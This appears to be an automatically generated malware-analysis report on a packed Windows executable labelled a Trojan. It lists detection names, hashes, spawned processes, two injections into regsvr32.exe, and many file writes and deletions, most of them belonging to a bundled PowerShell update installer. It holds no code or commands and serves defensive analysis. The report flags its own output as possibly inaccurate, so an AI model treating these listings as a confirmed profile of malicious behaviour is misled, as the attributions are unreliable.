HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Generic.17186758 (B) (Emsisoft), Trojan.Generic.17186758 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 5dcbad8bc9a8b07f5e97ca8089faaf22
SHA1: f3a340a7fad115b588ff4fe251beabf676df9f99
SHA256: 544a2a05509fe78736847e64700ee78907d3abe49428a26261c476addc4cf29b
SSDeep: 12288:1QHlW7lerECtu4aLgbqu6khVc0qI7oe3gPxWNpUcocscxFZwh:1QQperrOUj6k7ZqC30VFMlwh
Size: 813923 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-08-22 07:01:48
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:312
PSSetupNativeUtils.exe:3556
mofcomp.exe:3924
wscript.exe:1992
WindowsXP-KB968930-x86-ENG.exe:2764
ngen.exe:2472
ngen.exe:2904
ngen.exe:2456
ngen.exe:2564
ngen.exe:3000
ngen.exe:2960
ngen.exe:1816
ngen.exe:2520
ngen.exe:2484
ngen.exe:2980
ngen.exe:2348
ngen.exe:3020
ngen.exe:2500
ngen.exe:2444
ngen.exe:2580
ngen.exe:224
ngen.exe:784
ngen.exe:2992
ngen.exe:2492
ngen.exe:2412
ngen.exe:2372
ngen.exe:2532
ngen.exe:2512
update.exe:2828
mscorsvw.exe:2656
mscorsvw.exe:1088
mscorsvw.exe:3536
mscorsvw.exe:3068
mscorsvw.exe:2320
mscorsvw.exe:524
mscorsvw.exe:2152
mscorsvw.exe:420
mscorsvw.exe:2408
mscorsvw.exe:2360
mscorsvw.exe:2580
mscorsvw.exe:3072
mscorsvw.exe:3724
mscorsvw.exe:3644
mscorsvw.exe:3720
mscorsvw.exe:2516
mscorsvw.exe:3204
mscorsvw.exe:3784
mscorsvw.exe:3396
mscorsvw.exe:3224
mscorsvw.exe:3036
mscorsvw.exe:2896
mscorsvw.exe:1768
mscorsvw.exe:2008
PSCustomSetupUtil.exe:452
PSCustomSetupUtil.exe:1096
PSCustomSetupUtil.exe:2824
PSCustomSetupUtil.exe:4024
PSCustomSetupUtil.exe:252
PSCustomSetupUtil.exe:2800
PSCustomSetupUtil.exe:796
PSCustomSetupUtil.exe:4064
PSCustomSetupUtil.exe:320
PSCustomSetupUtil.exe:2648
PSCustomSetupUtil.exe:4092
PSCustomSetupUtil.exe:584
PSCustomSetupUtil.exe:2708
PSCustomSetupUtil.exe:2624
PSCustomSetupUtil.exe:2568
PSCustomSetupUtil.exe:2608
PSCustomSetupUtil.exe:2696
PSCustomSetupUtil.exe:1880
PSCustomSetupUtil.exe:1992
PSCustomSetupUtil.exe:1540
PSCustomSetupUtil.exe:1288
PSCustomSetupUtil.exe:2756
PSCustomSetupUtil.exe:3964
PSCustomSetupUtil.exe:3988
PSCustomSetupUtil.exe:648
PSCustomSetupUtil.exe:2008
UUPPHBZOfNIWNOEBZBhdR.exe:1076
regsvr32.exe:2380
regsvr32.exe:1752
wsmanhttpconfig.exe:3892
wsmanhttpconfig.exe:3828
The Trojan injects its code into the following process(es):
regsvr32.exe:2024
regsvr32.exe:324
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\TcEMbLQgCOBP (4077 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBh (803 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe (13304 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\TcEMbLQgCOBP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBh (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe (0 bytes)
The process PSSetupNativeUtils.exe:3556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
The process mofcomp.exe:3924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)
The process WindowsXP-KB968930-x86-ENG.exe:2764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\82ea8d5099742dc8f49f42\wsmres.dll (6164 bytes)
C:\82ea8d5099742dc8f49f42\about_switch.help.txt (489 bytes)
C:\82ea8d5099742dc8f49f42\about_foreach.help.txt (10 bytes)
C:\82ea8d5099742dc8f49f42\about_functions.help.txt (586 bytes)
C:\82ea8d5099742dc8f49f42\about_do.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\82ea8d5099742dc8f49f42\eventforwarding.adm (2 bytes)
C:\82ea8d5099742dc8f49f42\about_pssessions.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_wildcards.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.resources.dll (9 bytes)
C:\82ea8d5099742dc8f49f42\wsmpty.xsl (1 bytes)
C:\82ea8d5099742dc8f49f42\about_remote.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_debuggers.help.txt (21 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.dll (1145 bytes)
C:\82ea8d5099742dc8f49f42\about_command_syntax.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\82ea8d5099742dc8f49f42\about_requires.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\pspluginwkr.dll (1756 bytes)
C:\82ea8d5099742dc8f49f42\certificate.format.ps1xml (155 bytes)
C:\82ea8d5099742dc8f49f42\diagnostics.format.ps1xml (590 bytes)
C:\82ea8d5099742dc8f49f42\about_break.help.txt (792 bytes)
C:\82ea8d5099742dc8f49f42\wsmauto.dll (1842 bytes)
C:\82ea8d5099742dc8f49f42\powershell_ise.exe (2526 bytes)
C:\82ea8d5099742dc8f49f42\about_quoting_rules.help.txt (659 bytes)
C:\82ea8d5099742dc8f49f42\winrscmd.dll (2907 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\82ea8d5099742dc8f49f42\powershell_ise.resources.dll (4 bytes)
C:\82ea8d5099742dc8f49f42\update\kb968930xp.cat (512 bytes)
C:\82ea8d5099742dc8f49f42\getevent.types.ps1xml (15 bytes)
C:\82ea8d5099742dc8f49f42\winrmprov.mof (789 bytes)
C:\82ea8d5099742dc8f49f42\wsmwmipl.dll (2816 bytes)
C:\82ea8d5099742dc8f49f42\update\update.exe (10748 bytes)
C:\82ea8d5099742dc8f49f42\update (4 bytes)
C:\82ea8d5099742dc8f49f42\default.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\wevtfwd.dll (3351 bytes)
C:\82ea8d5099742dc8f49f42\about_if.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\about_assignment_operators.help.txt (379 bytes)
C:\82ea8d5099742dc8f49f42\about_variables.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\winrm.vbs (2727 bytes)
C:\82ea8d5099742dc8f49f42\wtrinstaller.ico (4803 bytes)
C:\82ea8d5099742dc8f49f42\about_history.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\pscustomsetuputil.exe (316 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\82ea8d5099742dc8f49f42\about_type_operators.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\about_join.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\powershell.exe (7339 bytes)
C:\82ea8d5099742dc8f49f42\about_pipelines.help.txt (411 bytes)
C:\82ea8d5099742dc8f49f42\about_arrays.help.txt (8 bytes)
C:\82ea8d5099742dc8f49f42\about_line_editing.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\82ea8d5099742dc8f49f42\about_commonparameters.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\about_data_sections.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\about_path_syntax.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\82ea8d5099742dc8f49f42\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\82ea8d5099742dc8f49f42\update\update.inf (2457 bytes)
C:\82ea8d5099742dc8f49f42\about_continue.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42 (768 bytes)
C:\82ea8d5099742dc8f49f42\pwrshplugin.dll (802 bytes)
C:\82ea8d5099742dc8f49f42\importallmodules.psd1 (438 bytes)
C:\82ea8d5099742dc8f49f42\winrm.cmd (35 bytes)
C:\82ea8d5099742dc8f49f42\spmsg.dll (495 bytes)
C:\82ea8d5099742dc8f49f42\update\update.ver (14 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.dll (3386 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\82ea8d5099742dc8f49f42\about_pssession_details.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\types.ps1xml (2510 bytes)
C:\82ea8d5099742dc8f49f42\winrs.exe (1154 bytes)
C:\82ea8d5099742dc8f49f42\about_command_precedence.help.txt (8 bytes)
C:\82ea8d5099742dc8f49f42\winrssrv.dll (12 bytes)
C:\82ea8d5099742dc8f49f42\about_parsing.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\help.format.ps1xml (3947 bytes)
C:\82ea8d5099742dc8f49f42\about_core_commands.help.txt (221 bytes)
C:\82ea8d5099742dc8f49f42\about_properties.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_troubleshooting.help.txt (146 bytes)
C:\82ea8d5099742dc8f49f42\about_signing.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\about_regular_expressions.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\about_profiles.help.txt (457 bytes)
C:\82ea8d5099742dc8f49f42\bitstransfer.psd1 (950 bytes)
C:\82ea8d5099742dc8f49f42\about_providers.help.txt (59 bytes)
C:\82ea8d5099742dc8f49f42\pwrshmsg.dll (4 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_output.help.txt (887 bytes)
C:\82ea8d5099742dc8f49f42\about_hash_tables.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_reserved_words.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\bitstransfer.format.ps1xml (16 bytes)
C:\82ea8d5099742dc8f49f42\about_scopes.help.txt (76 bytes)
C:\82ea8d5099742dc8f49f42\about_trap.help.txt (10 bytes)
C:\82ea8d5099742dc8f49f42\about_environment_variables.help.txt (417 bytes)
C:\82ea8d5099742dc8f49f42\about_objects.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.dll (38414 bytes)
C:\82ea8d5099742dc8f49f42\about_ws-management_cmdlets.help.txt (405 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\82ea8d5099742dc8f49f42\$shtdwn$.req (788 bytes)
C:\82ea8d5099742dc8f49f42\about_windows_powershell_2.0.help.txt (453 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\82ea8d5099742dc8f49f42\about_wmi_cmdlets.help.txt (8 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.resources.dll (562 bytes)
C:\82ea8d5099742dc8f49f42\about_prompts.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_throw.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\filesystem.format.ps1xml (133 bytes)
C:\82ea8d5099742dc8f49f42\about_comment_based_help.help.txt (595 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.resources.dll (3153 bytes)
C:\82ea8d5099742dc8f49f42\about_parameters.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_eventlogs.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\spuninst.exe (3787 bytes)
C:\82ea8d5099742dc8f49f42\about_scripts.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.management.resources.dll (13 bytes)
C:\82ea8d5099742dc8f49f42\about_try_catch_finally.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_modules.help.txt (13 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\82ea8d5099742dc8f49f42\registry.format.ps1xml (20 bytes)
C:\82ea8d5099742dc8f49f42\windowsremoteshell.adm (12 bytes)
C:\82ea8d5099742dc8f49f42\about_ref.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.dll-help.xml (16567 bytes)
C:\82ea8d5099742dc8f49f42\winrm.ini (1956 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced_methods.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_for.help.txt (146 bytes)
C:\82ea8d5099742dc8f49f42\powershellcore.format.ps1xml (1492 bytes)
C:\82ea8d5099742dc8f49f42\about_split.help.txt (10 bytes)
C:\82ea8d5099742dc8f49f42\winrmprov.dll (591 bytes)
C:\82ea8d5099742dc8f49f42\winrshost.exe (22 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.dll (14450 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.dll (3118 bytes)
C:\82ea8d5099742dc8f49f42\about_methods.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_bits_cmdlets.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\wsmtxt.xsl (2 bytes)
C:\82ea8d5099742dc8f49f42\wsmauto.mof (4 bytes)
C:\82ea8d5099742dc8f49f42\about_operators.help.txt (770 bytes)
C:\82ea8d5099742dc8f49f42\update\updspapi.dll (5940 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.management.dll (5010 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\82ea8d5099742dc8f49f42\about_script_blocks.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\wsman.format.ps1xml (837 bytes)
C:\82ea8d5099742dc8f49f42\about_format.ps1xml.help.txt (17 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\82ea8d5099742dc8f49f42\about_job_details.help.txt (824 bytes)
C:\82ea8d5099742dc8f49f42\spupdsvc.exe (287 bytes)
C:\82ea8d5099742dc8f49f42\winrsmgr.dll (2 bytes)
C:\82ea8d5099742dc8f49f42\windowsremotemanagement.adm (574 bytes)
C:\82ea8d5099742dc8f49f42\about_logical_operators.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_types.ps1xml.help.txt (481 bytes)
C:\82ea8d5099742dc8f49f42\about_special_characters.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\about_preference_variables.help.txt (37 bytes)
C:\82ea8d5099742dc8f49f42\about_arithmetic_operators.help.txt (168 bytes)
C:\82ea8d5099742dc8f49f42\about_while.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_redirection.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced_parameters.help.txt (962 bytes)
C:\82ea8d5099742dc8f49f42\update\eula.txt (586 bytes)
C:\82ea8d5099742dc8f49f42\wsmsvc.dll (15909 bytes)
C:\82ea8d5099742dc8f49f42\about_locations.help.txt (794 bytes)
C:\82ea8d5099742dc8f49f42\pssetupnativeutils.exe (9 bytes)
C:\82ea8d5099742dc8f49f42\about_script_internationalization.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_jobs.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\about_windows_powershell_ise.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_return.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\82ea8d5099742dc8f49f42\powershell.exe.mui (10 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\82ea8d5099742dc8f49f42\wsmprovhost.exe (657 bytes)
C:\82ea8d5099742dc8f49f42\profile.ps1 (772 bytes)
C:\82ea8d5099742dc8f49f42\dotnettypes.format.ps1xml (266 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.runtime.dll (33 bytes)
C:\82ea8d5099742dc8f49f42\about_language_keywords.help.txt (11 bytes)
C:\82ea8d5099742dc8f49f42\windowspowershellhelp.chm (26041 bytes)
C:\82ea8d5099742dc8f49f42\about_comparison_operators.help.txt (11 bytes)
C:\82ea8d5099742dc8f49f42\about_transactions.help.txt (1011 bytes)
C:\82ea8d5099742dc8f49f42\about_pssnapins.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_jobs.help.txt (13 bytes)
C:\82ea8d5099742dc8f49f42\powershelltrace.format.ps1xml (344 bytes)
C:\82ea8d5099742dc8f49f42\about_execution_policies.help.txt (13 bytes)
C:\82ea8d5099742dc8f49f42\wsmplpxy.dll (603 bytes)
C:\82ea8d5099742dc8f49f42\about_automatic_variables.help.txt (14 bytes)
C:\82ea8d5099742dc8f49f42\wsmanhttpconfig.exe (3009 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\pwrshsip.dll (24 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_requirements.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_aliases.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_escape_characters.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_faq.help.txt (775 bytes)
C:\82ea8d5099742dc8f49f42\about_session_configurations.help.txt (276 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\82ea8d5099742dc8f49f42\update\spcustom.dll (23 bytes)
The Trojan deletes the following file(s):
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_switch.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_foreach.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_functions.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_do.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\eventforwarding.adm (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_wildcards.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\wsmpty.xsl (0 bytes)
C:\82ea8d5099742dc8f49f42\wsmwmipl.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_debuggers.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_prompts.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_parsing.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_requires.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\pspluginwkr.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\powershellcore.format.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_bits_cmdlets.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_break.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\wsmauto.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\powershell_ise.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\about_quoting_rules.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\winrscmd.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\powershell_ise.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\update\kb968930xp.cat (0 bytes)
C:\82ea8d5099742dc8f49f42\getevent.types.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\winrmprov.mof (0 bytes)
C:\82ea8d5099742dc8f49f42\about_remote.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\update\update.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\update (0 bytes)
C:\82ea8d5099742dc8f49f42\default.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\wevtfwd.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_if.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_assignment_operators.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_while.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\winrm.vbs (0 bytes)
C:\82ea8d5099742dc8f49f42\wtrinstaller.ico (0 bytes)
C:\82ea8d5099742dc8f49f42\about_history.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\update\update.ver (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_type_operators.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_variables.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\powershell.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\about_pipelines.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_arrays.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_scopes.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_core_commands.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_data_sections.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_path_syntax.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\update\update.inf (0 bytes)
C:\82ea8d5099742dc8f49f42\about_continue.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42 (0 bytes)
C:\82ea8d5099742dc8f49f42\profile.ps1 (0 bytes)
C:\82ea8d5099742dc8f49f42\importallmodules.psd1 (0 bytes)
C:\82ea8d5099742dc8f49f42\about_wmi_cmdlets.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\winrm.cmd (0 bytes)
C:\82ea8d5099742dc8f49f42\spmsg.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\pscustomsetuputil.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\winrssrv.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\82ea8d5099742dc8f49f42\wsmres.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_pssession_details.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\types.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\winrs.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\about_command_precedence.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_pssessions.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_command_syntax.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\help.format.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_output.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\wsmprovhost.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_troubleshooting.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_signing.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_parameters.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_regular_expressions.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_profiles.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\wsmtxt.xsl (0 bytes)
C:\82ea8d5099742dc8f49f42\about_providers.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\pwrshmsg.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_types.ps1xml.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_hash_tables.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_reserved_words.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_environment_variables.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_objects.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_line_editing.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_ws-management_cmdlets.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_windows_powershell_2.0.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\wsmplpxy.dll (0 bytes)
C:\_557968_ (0 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_properties.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\wsmanhttpconfig.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\filesystem.format.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_commonparameters.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_comment_based_help.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_ref.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\pwrshsip.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\spuninst.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\about_scripts.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.management.resources.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_try_catch_finally.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_modules.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\registry.format.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\windowsremoteshell.adm (0 bytes)
C:\82ea8d5099742dc8f49f42\about_special_characters.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.dll-help.xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_session_configurations.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced_methods.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_for.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_format.ps1xml.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\certificate.format.ps1xml (0 bytes)
C:\82ea8d5099742dc8f49f42\about_split.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\winrmprov.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\winrshost.exe (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\about_methods.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\about_join.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\bitstransfer.psd1 (0 bytes)
C:\82ea8d5099742dc8f49f42\wsmauto.mof (0 bytes)
C:\82ea8d5099742dc8f49f42\about_operators.help.txt (0 bytes)
C:\82ea8d5099742dc8f49f42\update\updspapi.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.management.dll (0 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
